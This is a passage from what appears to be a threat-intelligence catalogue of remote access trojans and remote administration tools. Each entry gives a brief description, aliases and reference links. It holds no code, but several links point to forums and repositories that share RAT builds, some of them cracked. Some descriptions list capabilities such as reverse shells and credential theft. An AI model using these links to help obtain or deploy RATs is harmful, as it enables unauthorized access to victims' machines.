<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://prorat.software.informer.com/">http://prorat.software.informer.com/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.wikia.com/wiki/ProRat">http://malware.wikia.com/wiki/ProRat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_setro"><a class="anchor" href="#_setro"></a><a class="link" href="#_setro">Setro</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2232. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sites.google.com/site/greymecompany/setro-rat-project">https://sites.google.com/site/greymecompany/setro-rat-project</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indetectables_rat"><a class="anchor" href="#_indetectables_rat"></a><a class="link" href="#_indetectables_rat">Indetectables RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2233. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html">http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_luminosity_link"><a class="anchor" href="#_luminosity_link"></a><a class="link" href="#_luminosity_link">Luminosity Link</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2234. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://luminosity.link/">https://luminosity.link/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_orcus"><a class="anchor" href="#_orcus"></a><a class="link" href="#_orcus">Orcus</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2235. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://orcustechnologies.com/">https://orcustechnologies.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blizzard"><a class="anchor" href="#_blizzard"></a><a class="link" href="#_blizzard">Blizzard</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2236. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html">http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kazybot"><a class="anchor" href="#_kazybot"></a><a class="link" href="#_kazybot">Kazybot</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2237. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/kazybot-lite-php-rat/">https://www.rekings.com/kazybot-lite-php-rat/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://telussecuritylabs.com/threats/show/TSL20150122-06">http://telussecuritylabs.com/threats/show/TSL20150122-06</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bx"><a class="anchor" href="#_bx"></a><a class="link" href="#_bx">BX</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2238. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html">http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_death"><a class="anchor" href="#_death"></a><a class="link" href="#_death">death</a></h3>
</div>
<div class="sect2">
<h3 id="_sky_wyder"><a class="anchor" href="#_sky_wyder"></a><a class="link" href="#_sky_wyder">Sky Wyder</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2239. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://rubear.me/threads/sky-wyder-2016-cracked.127/">https://rubear.me/threads/sky-wyder-2016-cracked.127/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darktrack"><a class="anchor" href="#_darktrack"></a><a class="link" href="#_darktrack">DarkTrack</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2240. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/darktrack-4-alien/">https://www.rekings.com/darktrack-4-alien/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml">http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xrat"><a class="anchor" href="#_xrat"></a><a class="link" href="#_xrat">xRAT</a></h3>
<div class="paragraph">
<p>Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote Administration Tool coded in C# (using .NET Framework 2.0).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2241. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/c4bbage/xRAT">https://github.com/c4bbage/xRAT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_biodox"><a class="anchor" href="#_biodox"></a><a class="link" href="#_biodox">Biodox</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2242. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html">http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_offence"><a class="anchor" href="#_offence"></a><a class="link" href="#_offence">Offence</a></h3>
<div class="paragraph">
<p>Offense RAT is a free renote administration tool made in Delphi 9.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2243. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-31386?tid=31386&amp;&amp;pq=1">https://leakforums.net/thread-31386?tid=31386&amp;&amp;pq=1</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apocalypse_2"><a class="anchor" href="#_apocalypse_2"></a><a class="link" href="#_apocalypse_2">Apocalypse</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2244. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-36962">https://leakforums.net/thread-36962</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jcage"><a class="anchor" href="#_jcage"></a><a class="link" href="#_jcage">JCage</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2245. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-363920">https://leakforums.net/thread-363920</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nuclear_rat"><a class="anchor" href="#_nuclear_rat"></a><a class="link" href="#_nuclear_rat">Nuclear RAT</a></h3>
<div class="paragraph">
<p>Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2246. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.wikia.com/wiki/Nuclear_RAT">http://malware.wikia.com/wiki/Nuclear_RAT</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/">http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ozone"><a class="anchor" href="#_ozone"></a><a class="link" href="#_ozone">Ozone</a></h3>
<div class="paragraph">
<p>C++ REMOTE CONTROL PROGRAM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2247. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ozonercp.com/">http://ozonercp.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xanity"><a class="anchor" href="#_xanity"></a><a class="link" href="#_xanity">Xanity</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2248. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/alienwithin/xanity-php-rat">https://github.com/alienwithin/xanity-php-rat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkmoon"><a class="anchor" href="#_darkmoon"></a><a class="link" href="#_darkmoon">DarkMoon</a></h3>
<div class="paragraph">
<p>DarkMoon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dark Moon</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_xpert"><a class="anchor" href="#_xpert"></a><a class="link" href="#_xpert">Xpert</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2249. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://broad-product.biz/forum/r-a-t-(remote-administration-tools)/xpert-rat-3-0-10-by-abronsius(vb6)/">http://broad-product.biz/forum/r-a-t-(remote-administration-tools)/xpert-rat-3-0-10-by-abronsius(vb6)/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nulled.to/topic/18355-xpert-rat-309/">https://www.nulled.to/topic/18355-xpert-rat-309/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://trickytamilan.blogspot.lu/2016/03/xpert-rat.html">https://trickytamilan.blogspot.lu/2016/03/xpert-rat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kiler_rat"><a class="anchor" href="#_kiler_rat"></a><a class="link" href="#_kiler_rat">Kiler RAT</a></h3>
<div class="paragraph">
<p>This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell. From stealing credentials stored in browsers to accessing the victims webcam. Through the Command &amp; Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread utilizing physic devices, such as USB drives, but also to use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well known njrat, as they share many similar features such as their display style, several abilities and a general template for communication methods . However, where njrat left off KilerRat has taken over. KilerRat is a very feature rich RAT with an active development force that is rapidly gaining in popularity amongst the middle eastern community and the world.</p>
</div>
<div class="paragraph">
<p>Kiler RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Njw0rm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2250. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off">https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_brat"><a class="anchor" href="#_brat"></a><a class="link" href="#_brat">Brat</a></h3>
</div>
<div class="sect2">
<h3 id="_mini_mo"><a class="anchor" href="#_mini_mo"></a><a class="link" href="#_mini_mo">MINI-MO</a></h3>
</div>
<div class="sect2">
<h3 id="_lost_door"><a class="anchor" href="#_lost_door"></a><a class="link" href="#_lost_door">Lost Door</a></h3>
<div class="paragraph">
<p>Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. Its promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT is found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.</p>
</div>
<div class="paragraph">
<p>Lost Door is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>LostDoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2251. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://lost-door.blogspot.lu/">http://lost-door.blogspot.lu/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/">http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/lost-door-rat">https://www.cyber.nj.gov/threat-profiles/trojan-variants/lost-door-rat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loki_rat"><a class="anchor" href="#_loki_rat"></a><a class="link" href="#_loki_rat">Loki RAT</a></h3>
<div class="paragraph">
<p>Loki RAT is a php RAT that means no port forwarding is needed for this RAT, If you dont know how to setup this RAT click on tutorial.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2252. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/loki-rat-php-rat/">https://www.rekings.com/loki-rat-php-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mlrat"><a class="anchor" href="#_mlrat"></a><a class="link" href="#_mlrat">MLRat</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2253. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/BahNahNah/MLRat">https://github.com/BahNahNah/MLRat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spycronic"><a class="anchor" href="#_spycronic"></a><a class="link" href="#_spycronic">SpyCronic</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2254. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://perfect-conexao.blogspot.lu/2014/09/spycronic-1021.html">http://perfect-conexao.blogspot.lu/2014/09/spycronic-1021.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2013/09/spycronic-v1.02.1.html">http://www.connect-trojan.net/2013/09/spycronic-v1.02.1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://ranger-exploit.com/spycronic-v1-02-1/">https://ranger-exploit.com/spycronic-v1-02-1/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pupy"><a class="anchor" href="#_pupy"></a><a class="link" href="#_pupy">Pupy</a></h3>
<div class="paragraph">
<p>Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2255. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nova"><a class="anchor" href="#_nova"></a><a class="link" href="#_nova">Nova</a></h3>
<div class="paragraph">
<p>Nova is a proof of concept demonstrating screen sharing over UDP hole punching.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2256. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://novarat.sourceforge.net/">http://novarat.sourceforge.net/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bd_y3k_rat"><a class="anchor" href="#_bd_y3k_rat"></a><a class="link" href="#_bd_y3k_rat">BD Y3K RAT</a></h3>
<div class="paragraph">
<p>BD Y3K RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Back Door Y3K RAT</p>
</li>
<li>
<p>Y3k</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2257. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9401&amp;signatureSubId=2">https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9401&amp;signatureSubId=2</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9401&amp;signatureSubId=0&amp;softwareVersion=6.0&amp;releaseVersion=S177">https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9401&amp;signatureSubId=0&amp;softwareVersion=6.0&amp;releaseVersion=S177</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20292">https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20292</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20264">https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20264</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turkojan"><a class="anchor" href="#_turkojan"></a><a class="link" href="#_turkojan">Turkojan</a></h3>
<div class="paragraph">
<p>Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2258. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://turkojan.blogspot.lu/">http://turkojan.blogspot.lu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tiny"><a class="anchor" href="#_tiny"></a><a class="link" href="#_tiny">TINY</a></h3>
<div class="paragraph">
<p>TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2259. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://josh.com/tiny/">http://josh.com/tiny/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shark_2"><a class="anchor" href="#_shark_2"></a><a class="link" href="#_shark_2">SharK</a></h3>
<div class="paragraph">
<p>sharK is an advanced reverse connecting, firewall bypassing remote administration tool written in VB6. With sharK you will be able to administrate every PC (using Windows OS) remotely.</p>
</div>
<div class="paragraph">
<p>SharK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SHARK</p>
</li>
<li>
<p>Shark</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2260. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.security-database.com/toolswatch/SharK-3-Remote-Administration-Tool.html">https://www.security-database.com/toolswatch/SharK-3-Remote-Administration-Tool.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://lpc1.clpccd.cc.ca.us/lpc/mdaoud/CNT7501/NETLABS/Ethical_Hacking_Lab_05.pdf">http://lpc1.clpccd.cc.ca.us/lpc/mdaoud/CNT7501/NETLABS/Ethical_Hacking_Lab_05.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snowdoor"><a class="anchor" href="#_snowdoor"></a><a class="link" href="#_snowdoor">Snowdoor</a></h3>
<div class="paragraph">
<p>Backdoor.Snowdoor is a Backdoor Trojan Horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5,328.</p>
</div>
<div class="paragraph">
<p>Snowdoor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Backdoor.Blizzard</p>
</li>
<li>
<p>Backdoor.Fxdoor</p>
</li>
<li>
<p>Backdoor.Snowdoor</p>
</li>
<li>
<p>Backdoor:Win32/Snowdoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2261. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2003-022018-5040-99">https://www.symantec.com/security_response/writeup.jsp?docid=2003-022018-5040-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_paradox"><a class="anchor" href="#_paradox"></a><a class="link" href="#_paradox">Paradox</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2262. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nulled.to/topic/155464-paradox-rat/">https://www.nulled.to/topic/155464-paradox-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spynote"><a class="anchor" href="#_spynote"></a><a class="link" href="#_spynote">SpyNote</a></h3>
<div class="paragraph">
<p>Android RAT</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2263. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/spynote-v4-android-rat/">https://www.rekings.com/spynote-v4-android-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zombie_slayer"><a class="anchor" href="#_zombie_slayer"></a><a class="link" href="#_zombie_slayer">ZOMBIE SLAYER</a></h3>
</div>
<div class="sect2">
<h3 id="_http_web_backdoor"><a class="anchor" href="#_http_web_backdoor"></a><a class="link" href="#_http_web_backdoor">HTTP WEB BACKDOOR</a></h3>
</div>
<div class="sect2">
<h3 id="_net_monitor_pro"><a class="anchor" href="#_net_monitor_pro"></a><a class="link" href="#_net_monitor_pro">NET-MONITOR PRO</a></h3>
<div class="paragraph">
<p>Net Monitor for Employees lets you see what everyone&#8217;s doing - without leaving your desk. Monitor the activity of all employees. Plus you can share your screen with your employees PCs, making demos and presentations much easier.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2264. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://networklookout.com/help/">https://networklookout.com/help/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dameware_mini_remote_control"><a class="anchor" href="#_dameware_mini_remote_control"></a><a class="link" href="#_dameware_mini_remote_control">DameWare Mini Remote Control</a></h3>
<div class="paragraph">
<p>Affordable remote control software for all your customer support and help desk needs.</p>
</div>
<div class="paragraph">
<p>DameWare Mini Remote Control is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>dameware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2265. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.dameware.com/dameware-mini-remote-control">http://www.dameware.com/dameware-mini-remote-control</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_utilities"><a class="anchor" href="#_remote_utilities"></a><a class="link" href="#_remote_utilities">Remote Utilities</a></h3>
<div class="paragraph">
<p>Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2266. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.remoteutilities.com/">https://www.remoteutilities.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ammyy_admin"><a class="anchor" href="#_ammyy_admin"></a><a class="link" href="#_ammyy_admin">Ammyy Admin</a></h3>
<div class="paragraph">
